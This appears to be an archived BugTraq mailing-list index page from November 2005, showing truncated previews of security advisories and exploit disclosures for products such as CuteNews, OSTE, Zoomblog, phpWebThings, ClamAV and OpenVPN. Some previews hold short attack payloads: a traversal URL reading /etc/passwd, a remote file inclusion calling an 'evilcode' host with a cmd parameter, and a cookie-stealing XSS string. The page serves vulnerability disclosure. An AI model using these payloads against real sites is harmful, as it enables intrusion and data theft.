BugTraq Mode:
(Page 1253 of 1748)  < Prev  1248 1249 1250 1251 1252 1253 1254 1255 1256 1257 1258  Next >
Hidden accounts on sony vaio laptops 2005-11-07
yash kadakia securityforge com
Sony Vaio laptops require you to create a user account the first time you start your laptop. If the user you select is not "Administrator", Sony still goes ahead and creates a user "Administrator" with a blank password.

This user does not show up in control panel under User Accounts but if you do

[ more ]  [ reply ]
SEC Consult SA-20051107-1 :: Macromedia Flash Player ActionDefineFunction Memory Corruption 2005-11-07
Bernhard Mueller (research sec-consult com)
SEC-CONSULT Security Advisory 20051107-1
========================================================================
===============
title: Macromedia Flash Player ActionDefineFunction
Memory Corruption
program: Macromedia Flash Plugin
vuln

[ more ]  [ reply ]
Zone Labs Products Advance Program Control and OS Firewall (Behavioral Based) Technology Bypass Vulnerability 2005-11-07
Debasis Mohanty (debasis hackingspirits com)
Zone Labs Products Advance Program Control and OS Firewall (Behavioral
Based) Technology Bypass Vulnerability

I. PRODUCT BACKGROUND
ZoneAlarm Pro and Internet Security Suite with its a new level of protection
is what Zone Labs calls an "OS Firewall" based on "Behavior Based Analysis"
has gone beyo

[ more ]  [ reply ]
Path disclosure in CuteNews <= 1.4.0 2005-11-07
poizon securityinfo ru
A remote user can supply a specially crafted URL to
cause the system to display an error message that
discloses the installation path and other data.
Bug exists in "index.php".

Example:
http://victim.com/index.php?subaction=showfull
&id=1128227686&archive=../../../../../../etc/passwd%00&start_from=

[ more ]  [ reply ]
OSTE v1.0 Remote Command Exucetion 2005-11-07
khc bsdmail org
This is a toplist script

Web Site : http://oste.nerdie.org [site closed]

Version : Only 1.0

anyway there is a piece :)

Code :

http://www.site.com/index.php?page=http://evilcode?&cmd=

or www.site.com/?site=evilcode?&cmd=

Google look for : OSTE v1.0 © 2003 Tyler Hall

Thanks all Kurdish Hack

[ more ]  [ reply ]
Work in Progress: FileZilla Server Terminal V0.9.4d Buffer Overflow 2005-11-07
inge henriksen booleansoft com
** Inge Henriksen Security Advisory inge.henriksen (at) booleansoft (dot) com [email concealed] **

I have discovered a buffer overflow in FileZilla Server Terminal 0.9.4d. The exploit is still to be considered as a work in progress as it is still not clear to me why the exploit works on some systems and not others. Please let

[ more ]  [ reply ]
[SECURITY] [DSA 809-3] New squid packages fix regression 2005-11-07
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 809-3 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
November 7th, 2005

[ more ]  [ reply ]
[SECURITY] [DSA 885-1] New OpenVPN packages fix several vulnerabilities 2005-11-07
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 885-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
November 7th, 2005

[ more ]  [ reply ]
[SECURITY] [DSA 886-1] New chmlib packages fix several vulnerabilities 2005-11-07
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 886-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
November 7th, 2005

[ more ]  [ reply ]
Re: Zoomblog HTML Injection Vulnerability 2005-11-07
RBA (rba eListas com)
> Zoomblog is prone to HTML injection attacks. It is possible for a
> malicious Zoomblog user to inject hostile HTML and script code into
> the commentary via form fields.

This bug was corrected on Nov.4th.

Also, the "Zoomblog <IMG> BBCode Tag JavaScript Injection Vulnerability"
was corrected

[ more ]  [ reply ]
[SECURITY] [DSA 888-1] New OpenSSL packages fix cryptographic weakness 2005-11-07
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 888-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
November 7th, 2005

[ more ]  [ reply ]
[ GLSA 200511-05 ] GNUMP3d: Directory traversal and XSS vulnerabilities 2005-11-06
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200511-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
[ GLSA 200511-04 ] ClamAV: Multiple vulnerabilities 2005-11-06
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200511-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
EUSecWest/London Call for Papers and PacSec/Tokyo announcements 2005-11-06
Dragos Ruiu (dr pacsec jp)

url: http://eusecwest.com
url: http://pacsec.jp

(PacSec/Tokyo Announcement below...)

EUSecWest/core06 CALL FOR PAPERS
--------------------------------

London Security Summit February 20/21 2006

LONDON, United Kingdom -- Applied technical security
will be the focus of a new annual conference fr

[ more ]  [ reply ]
Gallery_v2.4 SQL Injection 2005-11-04
abducter_minds yahoo com
#!/bin/env perl
#------------------------------------------------------------#
#- Warning :- (ABDUCTER) Behind U BY (ABDUCTER_MINDS (at) S4A (dot) CC [email concealed]) OR (ABDUCTER_MINDS (at) YAHOO (dot) COM [email concealed])
#- [!] ==|| Gallery_v2.4 SQL Injection ||==
#- Gr33tz :-
#- N0N0

[ more ]  [ reply ]
Zoomblog HTML Injection Vulnerability 2005-11-04
sikikmail gmail com


DESCRIPTION
Zoomblog is prone to HTML injection attacks. It is possible for a malicious Zoomblog user to inject hostile HTML and script code into the commentary via form fields. This code may be rendered in the browser of a web user who views the commentary of Zoomblog.
Zoomblog does not adequatel

[ more ]  [ reply ]
Zoomblog HTML Injection Vulnerability 2005-11-04
sikikmail gmail com
DESCRIPTION
Zoomblog is prone to HTML injection attacks. It is possible for a malicious Zoomblog user to inject hostile HTML and script code into the commentary via form fields. This code may be rendered in the browser of a web user who views the commentary of Zoomblog.
Zoomblog does not adequately

[ more ]  [ reply ]
Re: OpenVPN[v2.0.x]: foreign_option() formart string vulnerability. 2005-11-04
v9 (v9 fakehalo us)
ah, that would be what i did when testing("client"), sorry for the
false/confusion with that... anyways, great software i use it for my vpn
needs...nicely documented and easy to use--thanks for its existence.

> Vade79,
>
> Thanks for your efforts in finding this! I've just released OpenVPN 2.0.4
>

[ more ]  [ reply ]
[waraxe-2005-SA#043] - Sql injection in Phorum 5.0.20 and earlier 2005-11-04
come2waraxe yahoo com
{=======================================================================
=========}
{ [waraxe-2005-SA#043] }
{=======================================================================
=========}
{

[ more ]  [ reply ]
Failles dans Invision Power Board 2.1 [xss] 2005-11-04
benjilenoob hotmail com
Auteur : benjilenoob
WebSite : http://benji.redkod.org/ and http://www.redkod.org/
Audit in pdf : http://benji.redkod.org/audits/ipb.2.1.pdf

Produit : Invision power board
Version : 2.1
Types de failles : Xss permanentes et non permanentes.
Risque : Faible.

I- failles XSS non critique:
-----------

[ more ]  [ reply ]
Xss - Html injection in XMB 2005-11-04
s2b hotmail com
Hello

This is Xss in the old versions and html injection in the new versions of xmb forums ..

Discovered By : HACKERS PAL

injected file
u2u.php

as the below
u2u.php?action=send&username=|Html Injection OR XSS

Thanks ,,

[ more ]  [ reply ]
Invision Power Board Privilege Esaclation (2.0.1 + more) 2005-11-04
Anti Matter (antimatter gmail com)
---------
Title: Invision Power Board
---------
Version: 2.0.1 (maybe more)
---------
Severity: Low
---------
Info: Invision Board Admin able to execute arbitrary code as uid of
the apache process.
----------
Bug(s):

#1 Fails to jail location of Task Managers scripts and allows
directory traversal.

[ more ]  [ reply ]
I-Saudi.Com First K-S-A WarGamE 2005-11-05
S3ude Hotmail com
This War Game is the first Saudi War Game.

we tried to make the War- Game levels so easy as

possible to make sure that experts and even

newbies can join us and have a good time.

The WarGame requires the basics of programming,

security bugs and needs some thinking. Many of

those people who

[ more ]  [ reply ]
XSS & SQL injection in phpWebThing 2005-11-05
xx_hack_xx_2004 hotmail com
Vulnerable: phpWebThings 1.4.4
http://phpwebthings.org

The bug reside in : forum.php

Exploit :

http://xxx.com/forum.php?forum=[XSS]
http://xxx.com/forum.php?forum=[SQL]

Example :

XSS

http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script>

SQL

For Passowrd

http://xxx.com/fo

[ more ]  [ reply ]
Zoomblog <IMG> BBCode Tag JavaScript Injection Vulnerability 2005-11-05
sikikmail gmail com
DETAILS
Zoomblog is prone to javascript injection attacks.
Zoomblog does not adequately filter <img> tags from various fields.
It is possible for a malicious Zoomblog user to inject hostile javascript code into the commentary via form fields. This code may be rendered in the browser of a web user

[ more ]  [ reply ]
Sql injection in ibProArcade 2005-11-05
bhfh01 gmail com

Sql injection in ibProArcade.
#############################

This bug was discoverd in all of the versions of ibproarcade 2.x.
It was tested and found perfectly working under vBulettin or Invision power board.
Date:2005-11-5

The injection is here:
module=report&user=[userid]
Query: 'SELECT name FR

[ more ]  [ reply ]
iDEFENSE Security Advisory 11.04.05: Clam AntiVirus tnef_attachment() DoS Vulnerability 2005-11-04
iDEFENSE Labs (labs-no-reply idefense com)
Clam AntiVirus tnef_attachment() DoS Vulnerability

iDEFENSE Security Advisory 11.04.05
http://www.idefense.com/application/poi/display?type=vulnerabilities
November 4, 2005

I. BACKGROUND

Clam AntiVirus is a GPL anti-virus toolkit for Unix.

II. DESCRIPTION

Remote exploitation of a design error i

[ more ]  [ reply ]
iDEFENSE Security Advisory 11.04.05: Clam AntiVirus Cabinet-file handling Denial of Service Vulnerability 2005-11-04
iDEFENSE Labs (labs-no-reply idefense com)
Clam AntiVirus Cabinet-file handling Denial of Service Vulnerability

iDEFENSE Security Advisory 11.04.05
http://www.idefense.com/application/poi/display?type=vulnerabilities
November 4, 2005

I. BACKGROUND

Clam AntiVirus is a GPL anti-virus toolkit for Unix.

II. DESCRIPTION

Remote exploitation o

[ more ]  [ reply ]
(Page 1253 of 1748)  < Prev  1248 1249 1250 1251 1252 1253 1254 1255 1256 1257 1258  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus